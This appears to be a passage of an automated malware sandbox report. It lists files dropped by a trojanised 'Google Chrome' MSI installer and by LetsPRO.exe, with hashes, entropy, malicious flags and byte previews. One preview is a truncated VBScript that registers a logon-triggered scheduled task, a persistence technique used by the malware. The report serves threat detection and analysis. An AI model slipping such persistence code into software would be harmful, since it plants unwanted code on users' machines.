                                      Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$........!.<.@.o.@.o.@.o.).n.B.o.6Do.@.o.(.n.@.o.(.n.@.o..)o.@.o.(.n.@.o.(.n.@.o.(.n.@.o.(.n.@.o.8mo.@.o6).n.@.o.).n.@.o0).n.@.o.8}o.@.o.@.o.C.o0).n.@.o0).n.@.o0).n.@.o0).o.@.o.@yo.@.o0).n.@.oRich.@.o........................PE..L....Zwd...........!.....:)..,...............P)...............................;.......<...@.`.......................`.5.Lm....6......P9...............;..3...p9.@).. c2.T....................d2.....xc2.@............P).x............................text...<8)......:)................. ..`.rdata.......P)......>).............@..@.data........`7..r...H7.............@....QMGuid......@9.......8.............@....rsrc........P9.......8.............@..@.reloc..@)...p9..*....8.............@..B........................................................................................................................................................................

                                      C:\Users\user\99944\1

                                      Download File
                                      Process:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9844736
                                      Entropy (8bit):7.99998096243402
                                      Encrypted:true
                                      SSDEEP:196608:qRlibNUmuwBTq1rmORsopQx6KUlel00nSzVnTHY8ouGs6HMfk3dW6Mw:Q2NUmJTq4DMelbSFjY8D6HMfymw
                                      MD5:75D0239E2D42FCB09AD6DD6380E58441
                                      SHA1:D146D55D9E3CAC254414C5D3DCCD56E55C62F229
                                      SHA-256:530A033F92543E1FE9061E5043F0EACBEC5A0DB300B862E8470FCD0C36FE07C1
                                      SHA-512:18FE51D9F9DED140E9A12F1C20C8FA4FA049892C480DCF933A29B15F3E3F063BE410245071DA77CAC34626FCBF60FE067F42D39EB4B03CFFD2FB88413314E695
                                      Malicious:true
                                      Preview:...#v.,g.6...9..p9...0...j.....L{....Z"T...X..F.r....p....4jTx..zqw.0,.2/4..:......./9q.c*..2Wu..67...j.b...'.....OA\?j...z..Y..4..aE.n34.)...o..=7.Q.T.F..p...d.......,.......]9.1.d...;..^<G...`..c.V.@.}L......[...D....8.8./+...p.7......9.m..6.*u..+.v....U.4...Z(^.Wk...)n.. .m&|..U...;T=....3d.}....\../i ..m..V.>....!7_+..bC..s.......0.@.....`.l"..a2.a..y$..9..^..+...G.R.|......M..o...M..4......%....04.*....QO...[.v....M#.6e.k.8..d......k`X.t.x.X!..,.j.vq{..1....2....s"=V[... .>.A......56..X...?.....I2y..[..GH=.w.A.....#S.....D..q)...d.Rakb.......K.P...H...9.'....W2...7.'x-.z:...r.7..H..|..e.hy..j.O.3..V.E.R..ew...D.f.R...a......%}..uK"[6..v&A9.I.....Q8`.L......=b.....R._..W.Q.\:K,PGc..{u=..f.(.W..5"........~....?.=..uV...<i@.W0....E;.Y.8f.J..C.%..'...*CDc%....s....8..1..UT3.........[uaj&f.7........G".#).x.u..1.P...).H.......?A^3.D.G...Q...x9Ok.O....$.).l....?...-..../0.`'}.=m...s.....W..v..a(.'..%...o..3....B..^..T...Pi.y..&...#vsu......]f. ..

                                      C:\Users\user\99944\144977.vbs

                                      Download File
                                      Process:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2400
                                      Entropy (8bit):4.792885848790128
                                      Encrypted:false
                                      SSDEEP:48:hz+30oOXel0JWbXw5s0DxonDuWKhjNV4+M52ui4T0MK8mdFDub0nLVtg:hzkeKXX0JDSDjmJS528lK8wY8Vi
                                      MD5:21D79CC9604AAA9318A89437DC462D05
                                      SHA1:AC84E4F72F4C1BDB6A6DD59FFF450959DD432BBE
                                      SHA-256:9C6FD2485D6FB37C997F99AA621B8CA08335FEDBC8284E7DE4F98D5B5CFEEBAD
                                      SHA-512:32D427D933A0CB80D0EBE151DC8F693C46A92F248D84379AF85E196E8020379FFAC518C1B1470B9267B77DF81A6F82C4E752D9AC80D4963F1E3281BB3E685731
                                      Malicious:true
                                      Preview:const TriggerTypeLogon = 9..' A constant that specifies an executable action...const ActionTypeExecutable = 0 ....'********************************************************..' Create the TaskService object...Set service = CreateObject("Schedule.Service")..Call service.Connect()....'********************************************************..' Get a folder to create a task definition in. ..Dim rootFolder..Set rootFolder = service.GetFolder("\")....' The taskDefinition variable is the TaskDefinition object...Dim taskDefinition..' The flags parameter is 0 because it is not supported...Set taskDefinition = service.NewTask(0) ....'********************************************************..' Define information about the task.....' Set the registration info for the task by ..' creating the RegistrationInfo object...Dim regInfo..Set regInfo = taskDefinition.RegistrationInfo..regInfo.Description = "Task will execute Notepad when a " & _.. "user logs on."..regInfo.Author = "Author Name"....' Se

                                      C:\Users\user\99944\LetsPRO.exe

                                      Download File
                                      Process:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):4.658263260341292
                                      Encrypted:false
                                      SSDEEP:96:d6kLgAfFGeOEdsmW2ZL0lpTSupF/ojJnkYY2oS6k9Tvg3uB:ZkA2mBpYpMkd2Ik9Tvgq
                                      MD5:A5FC151170B4BEF53A2918729AA6D3A9
                                      SHA1:5C4AA81EABF2B681D950813EFE91B4959DEF907F
                                      SHA-256:7462F9337A959B4F57B58CB2002016DD1BBDBD6A9B7BA339C933A5B6C1BBC324
                                      SHA-512:48FACE9B188040377787E0FF0E0725FED5CEFEE4AA5CE4B8CA89AF40352FEA559D446941858BB1A3DB6CACF901CBCAE62C8005EE616829974B6A7A9F01B8472B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'...E.."...'...*.......%...'...&.......%.......&...Rich'...................PE..L....J.f..................................... ....@..........................@..............................................8 ..<.................................................................................... ..8............................text............................... ..`.rdata..r.... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\5bb04a.msi

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 936, Revision Number: {924DFDB4-5E1D-409E-8393-FA9658AA79C4}, Number of Words: 2, Subject: Google Chrome, Author: Google, Name of Creating Application: Google Chrome, Template: ;2052, Comments: Installer Google Chrome , Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Apr 23 15:38:46 2024, Last Saved Time/Date: Tue Apr 23 15:38:46 2024, Last Printed: Tue Apr 23 15:38:46 2024, Number of Pages: 450
                                      Category:dropped
                                      Size (bytes):16345600
                                      Entropy (8bit):7.984095740506337
                                      Encrypted:false
                                      SSDEEP:393216:qCBN2m9uaDsIqvv3/L/2m68UzYWIMWLBM36dmdRwhm7YLp:RkmqvHv1M/q8dOh
                                      MD5:86561E111E7CE97E13A9936B9B4BA849
                                      SHA1:61CD40DA9253A367E416C9AB67E73738F18948C3
                                      SHA-256:BD462515EA9FFE66FC27D9BAA0FCC4BF733385829C2FC5676129AAEEB2E0AF88
                                      SHA-512:33D26416412D777FB2758BC41B44A9E9107906879C85BB4609702242DEB2BCD83ED8A5F5DA7A1D3E4662CA7B31DBFBBE1FAA8364952546FF600136E8C2CF7D54
                                      Malicious:false
                                      Preview:......................>.......................................................=...>...?...............................f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~...................................................................................................................................................................................................................................................................................................................N...............&...9........................................................................................... ...!..."...#...$...%...2...1...(...)...*...+...,...-......./...0.......7...3...4...5...6...<...8...:...;...(...'...)...............A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                      C:\Windows\Installer\MSIB403.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):448362
                                      Entropy (8bit):6.547715008215351
                                      Encrypted:false
                                      SSDEEP:6144:55CrUPJ84ilfnCHLDWEIMjq5vR4rPCrUPJ84ilfnCHLDWEIMjq5vR4r1a:5jPJHi1yIMG5OrNPJHi1yIMG5Org
                                      MD5:4830EA14D6C7E8A34D024E8EBD788B48
                                      SHA1:81118FBAF3763D650DB6B256ABBF8F8D44412211
                                      SHA-256:2A9FFBEEFC0550F69CA0011A99CDE64EB98B135734358B298D6A28538AE49C69
                                      SHA-512:3F8E89E8B8188E9F72229D330688B2768DBBA046DC5AB1AFB04D071CC65D65069DE9E571E3AAF4C3E41A63D743FB6168268AA342BA11C54DA008AC52D843429F
                                      Malicious:false
                                      Preview:...@IXOS.@.....@.f.X.@.....@.....@.....@.....@.....@......&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}..Google Chrome..sutup-Chrome.13.26.x64.msi.@.....@.....@.....@........&.{924DFDB4-5E1D-409E-8393-FA9658AA79C4}.....@.....@.....@.....@.......@.....@.....@.......@......Google Chrome......Rollback..ck(W.V...d\O:...[1]..RollbackCleanup..ck(W Rd..Y.N.e.N...e.N:. .[.1.]....@.......@........ProcessComponents..ck(W.f.e.~.N.l.Q.....@.....@.....@.]....&.{70366BA3-A10F-4C67-AC8A-4DFE5BE2D7FD}L.01:\Software\Google\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}\AI_INSTALLPERUSER.@.......@.....@.....@......&.{DB28640C-691F-42B8-A615-644DCA0203A3}3.C:\Program Files (x86)\WeGame\adapt_for_imports.dll.@.......@.....@.....@......&.{D8A595F1-49AD-4C63-BD58-95E574F97962}&.C:\Program Files (x86)\ChromeSetup.exe.@.......@.....@.....@......&.{AA4F795E-E67B-4915-8003-F1548190EC51}D.C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1.@.......@.....@.....@......&.{0EE71893-E09E-47F1-B09B-F0F2A40DE943}D.

                                      C:\Windows\Installer\MSIB404.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):220264
                                      Entropy (8bit):6.529506114174054
                                      Encrypted:false
                                      SSDEEP:3072:R5Lor2Lp9Zjxt8Bd9XF6N5RTNL5tludmMiz84Fak4lNAKIpwCHLDd4CHKECNE3QY:XCrUPJ84ilfnCHLDWEIMjq5vR4r7
                                      MD5:E7E51805794E1A71C5E2BDD45F4EE5C9
                                      SHA1:D178D4C1DEB28018A180AC3A6182E923660E16F5
                                      SHA-256:F6216D72F4D9A7D46F3B878650B2F26982E4F05B8B5CE363A60C564159DB781F
                                      SHA-512:5632CEAE01B6AAD3D806BCDF2BDAF40E487CB3DC48D83597429DC4E9C5867A878A87CA06C3A2E43E8FC532295B5B8EFBB472BD07C33F6B6629E877E3392EB576
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+..x..x..x...y..x...yi..x...y..x...y..x...y..x...y...x...y..x...y..x..x...x...y..x...y..x..:x..x.Rx..x...y..xRich..x................PE..L.....e.........."!...&.>...........;.......P...............................p......s.....@A........................@...........x....0..x............"..h:...@...!..$...p............................d..@............P......D...@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....didat..`.... ......................@....rsrc...x....0......................@..@.reloc...!...@..."..................@..B........................................................................................................................................................................................................................................

                                      C:\Windows\Installer\MSIB54D.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):417896
                                      Entropy (8bit):6.8043660889312765
                                      Encrypted:false
                                      SSDEEP:6144:Yb+2H9tragDe0dMOalADuFx9Ychph0lhSMXlBXBWNvvIFNa1yAIn:t2dMrl7Fph0lhSMXlknI8yAIn
                                      MD5:0901970C2066AED8A97D75AAF1FD3146
                                      SHA1:F0C700A4BFCEBAD9843E01A88BAB71B5F38996D8
                                      SHA-256:41F827E6ADDFC71D68CD4758336EDF602349FB1230256EC135121F95C670D773
                                      SHA-512:00E12FD2D752A01DFA75550FFAF3A2F337171CEC93CD013083C37137A455E93BEBD72E7D8487EC3E1DE5FE22994F058829A6597765612278C20D601192CBE733
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........^...0T..0T..0T_.3U..0T_.5U+.0T..4U..0T..3U..0T..5U.0T_.4U..0T_.6U..0T_.1U..0T..1T[.0T..9U..0T..0U..0T...T..0T...T..0T..2U..0TRich..0T........PE..L.....e.........."!...&.&...........t.......@...............................`............@A......................................... ..x............&..h:...0...-......p...........................@...@............@...............................text...Z$.......&.................. ..`.rdata.......@.......*..............@..@.data...............................@....rsrc...x.... ......................@..@.reloc...-...0......................@..B........................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\MSIB59C.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):417896
                                      Entropy (8bit):6.8043660889312765
                                      Encrypted:false
                                      SSDEEP:6144:Yb+2H9tragDe0dMOalADuFx9Ychph0lhSMXlBXBWNvvIFNa1yAIn:t2dMrl7Fph0lhSMXlknI8yAIn
                                      MD5:0901970C2066AED8A97D75AAF1FD3146
                                      SHA1:F0C700A4BFCEBAD9843E01A88BAB71B5F38996D8
                                      SHA-256:41F827E6ADDFC71D68CD4758336EDF602349FB1230256EC135121F95C670D773
                                      SHA-512:00E12FD2D752A01DFA75550FFAF3A2F337171CEC93CD013083C37137A455E93BEBD72E7D8487EC3E1DE5FE22994F058829A6597765612278C20D601192CBE733
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........^...0T..0T..0T_.3U..0T_.5U+.0T..4U..0T..3U..0T..5U.0T_.4U..0T_.6U..0T_.1U..0T..1T[.0T..9U..0T..0U..0T...T..0T...T..0T..2U..0TRich..0T........PE..L.....e.........."!...&.&...........t.......@...............................`............@A......................................... ..x............&..h:...0...-......p...........................@...@............@...............................text...Z$.......&.................. ..`.rdata.......@.......*..............@..@.data...............................@....rsrc...x.... ......................@..@.reloc...-...0......................@..B........................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\MSIB5FB.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):220264
                                      Entropy (8bit):6.529506114174054
                                      Encrypted:false
                                      SSDEEP:3072:R5Lor2Lp9Zjxt8Bd9XF6N5RTNL5tludmMiz84Fak4lNAKIpwCHLDd4CHKECNE3QY:XCrUPJ84ilfnCHLDWEIMjq5vR4r7
                                      MD5:E7E51805794E1A71C5E2BDD45F4EE5C9
                                      SHA1:D178D4C1DEB28018A180AC3A6182E923660E16F5
                                      SHA-256:F6216D72F4D9A7D46F3B878650B2F26982E4F05B8B5CE363A60C564159DB781F
                                      SHA-512:5632CEAE01B6AAD3D806BCDF2BDAF40E487CB3DC48D83597429DC4E9C5867A878A87CA06C3A2E43E8FC532295B5B8EFBB472BD07C33F6B6629E877E3392EB576
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+..x..x..x...y..x...yi..x...y..x...y..x...y..x...y...x...y..x...y..x..x...x...y..x...y..x..:x..x.Rx..x...y..xRich..x................PE..L.....e.........."!...&.>...........;.......P...............................p......s.....@A........................@...........x....0..x............"..h:...@...!..$...p............................d..@............P......D...@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....didat..`.... ......................@....rsrc...x....0......................@..@.reloc...!...@..."..................@..B........................................................................................................................................................................................................................................

                                      C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2}

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.170792491614045
                                      Encrypted:false
                                      SSDEEP:12:JSbX72FjzGiAGiLIlHVRp9h/7777777777777777777777777vDHFY9pwWt/l0i5:JRJQI5ZO6F
                                      MD5:305A27199F320D9A47A8219C2A0A1CBC
                                      SHA1:14F1B64D87DC3835753AD3CF3723BFF0D604E235
                                      SHA-256:6013BEF949960672E8E768E363C0EBE85E1583DCB7AAACA64638F4F0FE43FBBF
                                      SHA-512:A834C96B014511E7E11E2A1DBD95A3941595C7E55E93D4E2FD8574813C88B8394D09288F37A33CFFFEC16261A2BE4859B9B0A26E1E0EDE3A62AFBCD7F55A9A4B
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.509525634457451
                                      Encrypted:false
                                      SSDEEP:48:88Phj7uRc06WXJ+nT542GhS9SnAErCyMF4SjT9a:Thj71VnT3GU9BwCs
                                      MD5:BFB5342BA5B855CFF339E3AB828E0718
                                      SHA1:E98E9776F7B0F6A2E80FBB0FB2D1314BF5372E87
                                      SHA-256:DB55298F40AF92CC83178EC085D6FAA7821CBC7F5E3309E9F57D6743CE52DE7E
                                      SHA-512:1A1D75C16D65B38787721140DEFFAF8FBB4F718D6C4B11F687A1EDCF986C93D2FD619BE95248CB7F7891CB0B393E6B7385C9DDD8F2F05F5E713EB13D437B8ACF
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):364484
                                      Entropy (8bit):5.365503357975419
                                      Encrypted:false
                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauP:zTtbmkExhMJCIpEM
                                      MD5:98BF285C5916BE08BD290044B5C2655D
                                      SHA1:6895F60BDC48290AE9E394631E84869980CAD7C5
                                      SHA-256:F9BC60E2490462AF7F1356B217AA6BE375774F3EED9B179977C5513CA55770BA
                                      SHA-512:3153E733F3E72C6C1755D6C936088B60D39578E485AA7026E2C18D99962E1F694DCF846850608C71D07F750289ED231D6DF4D702278883704191194E1CFF38F9
                                      Malicious:false
                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):301856
                                      Entropy (8bit):6.654439927825066
                                      Encrypted:false
                                      SSDEEP:6144:5habloKMimZI46P5Bzb854fgJs3uVAOs5qiwckGIk0ggwJhi/rQx+D8P:al5MiU50jb854fgfK5qiw8Ik0ggwJhis
                                      MD5:4C3832FBE84B8CE63D8E3AB7D76F9983
                                      SHA1:EEA2D91B7D7D2CDF79BB9F354AF7A33D6014F544
                                      SHA-256:8FE2226E8BEC5A45D4B819359192AB92446B54859BF8877573AB7A3C8B4ADA76
                                      SHA-512:E6E316BF3414FFB2674BF240760B2617CED755B8A34AD4B3213BCCA6EA9A0AA3C2E094319D709A958F603B72197BFA34B100DBE87B618E17601B2E0DAC749F84
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L......e.............................s............@.................................J.....@.................................l........P...2...........r.. ).......(......T...........................h...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...(.......*...H..............@..B................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):402208
                                      Entropy (8bit):6.361069039231634
                                      Encrypted:false
                                      SSDEEP:12288:ge4r7rSB+2zUM2WJoROZEUT2N9oqs3Kw8q76uIx+Z:g5razT2N9fgKw76uIxq
                                      MD5:DAE993327723122C9288504A62E9F082
                                      SHA1:153427B6B0A5628360472F9AB0855A8A93855F57
                                      SHA-256:38903DEC79D41ABDA6FB7750B48A31FFCA418B3EAB19395A0A5D75D8A9204EE7
                                      SHA-512:517FC9EAF5BF193E984EEE4B739B62DF280D39CD7B6749BEC61D85087CC36BB942B1EBAED73E4A4A6E9FA3C85A162F7214D41EA25B862A4CF853E1129C10293D
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d......e.........."..........R.................@.............................p......].....`..................................................M....... ...2.......,...... )...`..8.... ..T............................ ..................(............................text............................... ..`.rdata.............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc..8....`......................@..B........................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):162080
                                      Entropy (8bit):5.986584434229805
                                      Encrypted:false
                                      SSDEEP:3072:DwzvOYTt5YP/aKavT/DvbEvK9aobNI2B+flkL7OjUuxGftPyhdY55s2ZUuyNFhyV:GtiP/aK2h9H/B+/
                                      MD5:BAF0B64AF9FCEAB44942506F3AF21C87
                                      SHA1:E78FB7C2DB9C1B1F9949F4FCD4B23596C1372E05
                                      SHA-256:581EDECA339BB8C5EBC1D0193AD77F5CAFA329C5A9ADF8F5299B1AFABED6623B
                                      SHA-512:EE590E4D5CCDD1AB6131E19806FFD0C12731DD12CF7BFB562DD8F5896D84A88EB7901C6196C85A0B7D60AEE28F8CFBBA62F8438D501EABD1BB01EC0B4F8D8004
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L......e.................D..........Ru.......`....@.......................................@.................................P...x....... ............P.. )..........p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):108320
                                      Entropy (8bit):6.4795260643674
                                      Encrypted:false
                                      SSDEEP:3072:OMxJ7Rfp8K172YPrN4vzT+PlZpsB+0H+EOZvMs:OMH7cCxPRpsB+s94Ms
                                      MD5:FF2D1B951CAFE2A3B88A168900844303
                                      SHA1:71A367F119E30C346C8B4A028CCFC8A122B0E53E
                                      SHA-256:F8E20A4EFB9BB32AF39E3CBC414412B3B01C0442ABFE214A58BC3ECCFFFD35B7
                                      SHA-512:6A35C8AB850552B64B3FC8853079559A69A302CEA6A8D44DB4BCC71322995E2EB3485B02317B2115D5236BE38A8A090751E55DAD6A59D181B843857DAD7E1690
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L......e..........................................@.................................R.....@..................................5..<....`..p2...........~.. )...........+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):185632
                                      Entropy (8bit):6.208575989324197
                                      Encrypted:false
                                      SSDEEP:3072:9ni3ZsI1rXRAmWt9h8QlLISqG+T1DpV9qEKLmoY46WeJbJ+O3dnD7:9ni3ZsQrBAmWt9h8QlLISZWVJohkn7d
                                      MD5:0FE3644C905D5547B3A855B2DC3DB469
                                      SHA1:80B38B7860A341F049F03BD5A61782FF7468EAC7
                                      SHA-256:7D5C0ED6617DBC1B78D2994A6E5BBDA474B5F4814D4A34D41F844CE9A3A4EB66
                                      SHA-512:E2CF9E61C290599F8F92214FAE67CCE23206A907C0AB27A25BE5D70F05D610A326395900B8ED8ED54F9ECBDDFD1B890F10280D00DBCDAD72E0272D23F0DB1E53
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d......e.........."......R...z.......R.........@.............................0......t.....`..................................................p..x....................... )... .......V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc....... ......................@..B........................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):223008
                                      Entropy (8bit):6.650401463042642
                                      Encrypted:false
                                      SSDEEP:6144:Bqml5a6EdkQxiUmRQColKGAOPQK2GwIgfx+qSfF0:gml5a6EdkQgUmR7G9QK3wJx+qSfF0
                                      MD5:021C57C74DE40F7C3B4FCF58A54D3649
                                      SHA1:EF363AB45B6FE3DD5B768655ADC4188AADF6B6FD
                                      SHA-256:04ADF40BA58D0AB892091C188822191F2597BC47DAB8B92423E8FC546DC437EF
                                      SHA-512:77E3BBB08C661285A49A66E8090A54F535727731C44B7253EA09FFE9548BAE9D120EF38A67DFA8A5D8DA170DDE3E9C1928B96C64DFC07B7F67F93B478937C018
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L......e.....................r......G.............@.......................................@..........................................0...2...........>.. )...p... ..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc... ...p..."..................@..B........................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):108320
                                      Entropy (8bit):6.479395999944146
                                      Encrypted:false
                                      SSDEEP:3072:vER5AhC48S1m2YPrh4qR8vLZksB+0Hdqxl:vEXAe6QP4ksB+sYL
                                      MD5:B191834EB918C5BCAA46E594561C53C9
                                      SHA1:1EAB0F1C6C4E6E36C454556022E80677F1A8360E
                                      SHA-256:0FA78EEA190E3AE9DDB0E6CD85EB5188947CE0BA748FC6D567ADE48B1FB3AE27
                                      SHA-512:D16BB62290C752866A150E6B52AE9A6478D8901B194A71F5768896E311A6B5750F4D6741501D8D807EE85C09F65EF2468992A384436838B61FAC5F955CDAD696
                                      Malicious:true
